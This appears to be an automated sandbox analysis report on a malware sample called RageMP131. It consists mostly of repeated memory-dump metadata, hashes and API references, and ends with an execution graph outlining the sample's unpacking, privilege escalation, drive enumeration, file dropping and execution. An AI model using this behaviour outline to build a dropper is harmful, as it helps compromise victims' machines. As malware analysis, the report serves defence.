                                    • Source File: 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000015.00000002.3728603761.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3729090981.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3729874616.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3733464868.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734204633.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734341467.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734440483.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734570883.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_21_2_270000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_destroy$___std_exception_copy
                                    • String ID: recursive_directory_iterator::operator++
                                    • API String ID: 1206660477-953255998
                                    • Opcode ID: d0df4faeb183193c5760e48c18384fa8a467427eee8f6a9f35b5c5ae4780f301
                                    • Instruction ID: 0594a0cc6d550537fc2993e345aaf3bf4f77f323e2df88938902f8f787ed5c99
                                    • Opcode Fuzzy Hash: d0df4faeb183193c5760e48c18384fa8a467427eee8f6a9f35b5c5ae4780f301
                                    • Instruction Fuzzy Hash: 9BE145B19106049FCB29DF68C845BAEF7F9FF45300F10861DE41A97B81E7B4AA54CBA1
                                    APIs
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 002786DE
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 002786ED
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000015.00000002.3728603761.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3729090981.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3729874616.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3733464868.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734204633.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734341467.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734440483.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734570883.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_21_2_270000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_destroy
                                    • String ID: at line $, column
                                    • API String ID: 4194217158-191570568
                                    • Opcode ID: 125baf7728b78b62a0fa8121292faf5e25d70e58cd6f9b2eb78f086d0f8516a6
                                    • Instruction ID: 195fe1d863000ff6bd8b5965a9c09037fea22a570f74ba845e180f6ccf4b6ea8
                                    • Opcode Fuzzy Hash: 125baf7728b78b62a0fa8121292faf5e25d70e58cd6f9b2eb78f086d0f8516a6
                                    • Instruction Fuzzy Hash: 9C614C71E102049FDB09DF68CC8979EBBB9FF45310F14821CE419AB781EB74AA90CB91
                                    APIs
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 002E4109
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 002E4122
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000015.00000002.3728603761.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3729090981.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3729874616.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3733464868.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734204633.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734341467.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734440483.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734570883.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_21_2_270000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_destroy
                                    • String ID: value
                                    • API String ID: 4194217158-494360628
                                    • Opcode ID: 6bf397057438b9e714ff422a7ac90402f6495ef7a9735df653876eb5fbb4c03b
                                    • Instruction ID: d238d4fd97478cca79163f5b8fa857034f87b2e33773b9f20a07177407746e52
                                    • Opcode Fuzzy Hash: 6bf397057438b9e714ff422a7ac90402f6495ef7a9735df653876eb5fbb4c03b
                                    • Instruction Fuzzy Hash: C051B3B0C10288DBDF15DFA4CC89BDDBBB4AF05304F148259E448AB382D7756A98CB61
                                    APIs
                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00273C0F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000015.00000002.3728603761.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3729090981.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3729874616.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3733464868.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734204633.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734341467.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734440483.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734570883.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_21_2_270000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_copy
                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                    • API String ID: 2659868963-1866435925
                                    • Opcode ID: 1ba982feae1316480fa85807d5f32f07fcb56bb261b5d4406637b8933199f747
                                    • Instruction ID: ff417a7a5d958731aab06304b771b13323bc143b358cf95a1f68f3d2ae7e86c6
                                    • Opcode Fuzzy Hash: 1ba982feae1316480fa85807d5f32f07fcb56bb261b5d4406637b8933199f747
                                    • Instruction Fuzzy Hash: CC11D2B6920709AFC715DF58D801B9AB3D8EF06320F14C52AF95C9B281F774EA24CB91
                                    Strings
                                    • unordered_map/set too long, xrefs: 002E2BD3
                                    Memory Dump Source
                                    • Source File: 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000015.00000002.3728603761.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3729090981.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3729874616.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3733464868.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734204633.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734341467.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734440483.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734570883.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_21_2_270000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: unordered_map/set too long
                                    • API String ID: 0-306623848
                                    • Opcode ID: 01a967d14be0733641e64cbc69bb50ff7b17bbbc526a5ab0eeb7ca28139cd986
                                    • Instruction ID: b63141e3bdff4508e106116ce9f99502dfbd3eece4a605317f297c32934a5f1a
                                    • Opcode Fuzzy Hash: 01a967d14be0733641e64cbc69bb50ff7b17bbbc526a5ab0eeb7ca28139cd986
                                    • Instruction Fuzzy Hash: 67E1F671A10146DFCB18DF69C891A6DB7E9FF48310F648369E81A9B382D730ED65CB90
                                    APIs
                                    • ___std_exception_copy.LIBVCRUNTIME ref: 0027844D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000015.00000002.3728603761.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3729090981.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3729874616.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3733464868.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734204633.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734341467.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734440483.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734570883.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_21_2_270000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_copy
                                    • String ID: parse error$ror
                                    • API String ID: 2659868963-4201802366
                                    • Opcode ID: 87698d26d3adb36f77554f4607e662a13d11798f6052d2bfdc83d73e97533c59
                                    • Instruction ID: 3d1654d047f19d5d8062bb9a9cafca8705c360263f37c69e2b8a27e82b746403
                                    • Opcode Fuzzy Hash: 87698d26d3adb36f77554f4607e662a13d11798f6052d2bfdc83d73e97533c59
                                    • Instruction Fuzzy Hash: 69C11731D206498FEB09CF68CC8979DBB75FF45304F14C248E4086B792DBB4AA94CB91
                                    APIs
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 00278051
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 00278060
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000015.00000002.3728603761.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3729090981.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3729874616.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3733464868.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734204633.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734341467.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734440483.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734570883.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_21_2_270000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_destroy
                                    • String ID: [json.exception.
                                    • API String ID: 4194217158-791563284
                                    • Opcode ID: 419064be4f55501ded65e828b5a55aee135d6d07bb460ae4704b461920b6ed6f
                                    • Instruction ID: 97923d660fc6d235490ee3944938389f686b57ff029218d748a27d681caff89b
                                    • Opcode Fuzzy Hash: 419064be4f55501ded65e828b5a55aee135d6d07bb460ae4704b461920b6ed6f
                                    • Instruction Fuzzy Hash: 0A9127309102089FDB19CFA8CC85BAEFBB5FF45314F14825DE404AB792D7B0A994CB91
                                    APIs
                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00273C0F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000015.00000002.3728603761.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3729090981.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3729874616.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3733464868.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734204633.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734341467.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734440483.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734570883.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_21_2_270000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_copy
                                    • String ID: ios_base::badbit set$ios_base::failbit set
                                    • API String ID: 2659868963-1240500531
                                    • Opcode ID: 258f7d2adcba02043f55f913fe27a3926144f96d5d609a4ade1d1b975ee23ea9
                                    • Instruction ID: 892e0ec4ccb3d8cfc838f70550755b752cf57a060b3c15531016a89cf1552865
                                    • Opcode Fuzzy Hash: 258f7d2adcba02043f55f913fe27a3926144f96d5d609a4ade1d1b975ee23ea9
                                    • Instruction Fuzzy Hash: 9441F6B5920209AFC715DF58CC41BAEF7F8EF45320F14C219F9189B681E774AA54CBA1
                                    APIs
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 002E4AB9
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 002E4AD2
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 002E55DD
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 002E55F6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000015.00000002.3728603761.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3729090981.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3729874616.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3733464868.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734204633.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734341467.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734440483.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734570883.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_21_2_270000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_destroy
                                    • String ID: value
                                    • API String ID: 4194217158-494360628
                                    • Opcode ID: 3f7b988a507dc18cdc505d3fb818f37e187c89a13a2c3bb078a803906b2db2e4
                                    • Instruction ID: 1e05613be504f1061421b5781bcfbf5b7803410dc3355016b0ff615804f34b3a
                                    • Opcode Fuzzy Hash: 3f7b988a507dc18cdc505d3fb818f37e187c89a13a2c3bb078a803906b2db2e4
                                    • Instruction Fuzzy Hash: CF51B2B0C20698DFDF15DFA4CC89BDEBBB8AF05304F544259E404AB381D774AA888B91
                                    APIs
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 002E9681
                                    Strings
                                    • type must be string, but is , xrefs: 002E96E8
                                    • type must be boolean, but is , xrefs: 002E9772
                                    Memory Dump Source
                                    • Source File: 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000015.00000002.3728603761.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3729090981.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3729874616.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3733464868.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734204633.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734341467.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734440483.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734570883.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_21_2_270000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Concurrency::cancel_current_task
                                    • String ID: type must be boolean, but is $type must be string, but is
                                    • API String ID: 118556049-436076039
                                    • Opcode ID: 4f89f316a25000d6372271e77e068d0bca0b1382f60b9e0981ef413721311ae6
                                    • Instruction ID: 6e53548c4497f92848ff39837fec5fcd97e55df26ad895c35140fe175e025ec2
                                    • Opcode Fuzzy Hash: 4f89f316a25000d6372271e77e068d0bca0b1382f60b9e0981ef413721311ae6
                                    • Instruction Fuzzy Hash: 08316E75D10284AFDB15EFA4D842B9EB7BCDB00310F50416AF819DB792EB34AD64CB52

                                    Execution Graph

                                    Execution Coverage:23.5%
                                    Dynamic/Decrypted Code Coverage:10.3%
                                    Signature Coverage:0%
                                    Total number of Nodes:300
                                    Total number of Limit Nodes:13
                                    execution_graph 1333 b56014 1334 b56035 GetModuleHandleA 1333->1334 1335 b5605f 1333->1335 1336 b5604d GetProcAddress 1334->1336 1337 b56058 1336->1337 1337->1335 1337->1336 1337->1337 1014 b56076 1015 b5607b 1014->1015 1019 b560c7 1014->1019 1017 b560b0 VirtualAlloc 1015->1017 1015->1019 1026 b561b2 1015->1026 1016 b5615f VirtualFree 1016->1019 1017->1019 1018 b56198 VirtualFree 1018->1026 1019->1016 1019->1018 1020 b560d5 VirtualAlloc 1019->1020 1020->1019 1021 b56389 VirtualProtect 1024 b563b7 1021->1024 1022 b563fc VirtualProtect 1023 b56400 1022->1023 1024->1022 1025 b563e7 VirtualProtect 1024->1025 1025->1022 1025->1024 1026->1021 1027 b562fb 1026->1027 1028 b514e1 1029 b51541 1028->1029 1030 b514fd GetModuleHandleA 1028->1030 1032 b51573 1029->1032 1034 b51549 1029->1034 1031 b5151a VirtualQuery 1030->1031 1033 b51512 1030->1033 1031->1033 1041 b51638 GetTempPathA GetSystemDirectoryA GetModuleFileNameA 1032->1041 1033->1029 1035 b51569 1034->1035 1037 b51557 1034->1037 1057 b51af9 1037->1057 1038 b51579 ExitProcess 1040 b51566 1040->1035 1042 b5167f 1041->1042 1043 b5167a 1041->1043 1063 b51718 GetSystemTimeAsFileTime 1042->1063 1081 b5139f GetVersionExA 1043->1081 1046 b51686 1047 b516ca 1046->1047 1050 b516a0 CreateThread 1046->1050 1048 b516d7 1047->1048 1049 b516d0 1047->1049 1052 b516dd lstrcpy 1048->1052 1054 b516d5 1048->1054 1075 b51581 1049->1075 1068 b52c48 memset 1050->1068 1313 b51099 1050->1313 1052->1038 1054->1038 1056 b51718 3 API calls 1056->1047 1058 b51b11 1057->1058 1059 b51b09 1057->1059 1061 b51b16 CreateThread 1058->1061 1062 b51b0f 1058->1062 1060 b51638 188 API calls 1059->1060 1060->1062 1061->1062 1332 b51638 189 API calls 1061->1332 1062->1040 1062->1062 1064 b51735 SHSetValueA 1063->1064 1065 b51754 1063->1065 1067 b51786 __aulldiv 1064->1067 1066 b5175a SHGetValueA 1065->1066 1065->1067 1066->1067 1067->1046 1102 b51973 PathFileExistsA 1068->1102 1070 b52cb2 1071 b516ba WaitForSingleObject 1070->1071 1072 b52cbb VirtualFree 1070->1072 1071->1056 1072->1071 1074 b52c8f CreateThread WaitForMultipleObjects 1074->1070 1124 b52b8c memset GetLogicalDriveStringsA 1074->1124 1293 b5185b GetSystemTimeAsFileTime srand rand srand rand 1075->1293 1077 b51592 wsprintfA wsprintfA lstrlen CreateFileA 1078 b51633 1077->1078 1079 b515fb WriteFile CloseHandle 1077->1079 1078->1054 1079->1078 1080 b5161d ShellExecuteA 1079->1080 1080->1078 1082 b513cf LookupPrivilegeValueA 1081->1082 1083 b514da 1081->1083 1084 b513e7 1082->1084 1085 b513ef 1082->1085 1083->1042 1294 b5119f GetCurrentProcess OpenProcessToken 1084->1294 1085->1083 1299 b5120e GetModuleHandleA GetProcAddress 1085->1299 1091 b51448 GetCurrentProcessId 1091->1083 1092 b51457 1091->1092 1092->1083 1093 b51319 3 API calls 1092->1093 1094 b5147f 1093->1094 1095 b51319 3 API calls 1094->1095 1096 b5148e 1095->1096 1096->1083 1097 b51319 3 API calls 1096->1097 1098 b514b4 1097->1098 1099 b51319 3 API calls 1098->1099 1100 b514c3 1099->1100 1101 b51319 3 API calls 1100->1101 1101->1083 1103 b519a0 1102->1103 1119 b51ac7 1102->1119 1104 b519af CreateFileA 1103->1104 1105 b519c4 Sleep 1104->1105 1106 b51a28 GetFileSize 1104->1106 1105->1104 1107 b519d5 1105->1107 1108 b51a80 1106->1108 1109 b51a38 1106->1109 1123 b5185b GetSystemTimeAsFileTime srand rand srand rand 1107->1123 1110 b51a96 1108->1110 1111 b51a8d FindCloseChangeNotification 1108->1111 1109->1108 1113 b51a3d VirtualAlloc 1109->1113 1114 b51aad 1110->1114 1115 b51a9c DeleteFileA 1110->1115 1111->1110 1113->1108 1117 b51a53 1113->1117 1114->1119 1122 b51ab8 VirtualFree 1114->1122 1115->1114 1116 b519da wsprintfA 